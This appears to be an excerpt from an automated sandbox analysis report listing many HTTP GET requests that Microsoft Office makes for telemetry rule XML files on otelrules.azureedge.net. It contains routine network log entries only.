                    Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
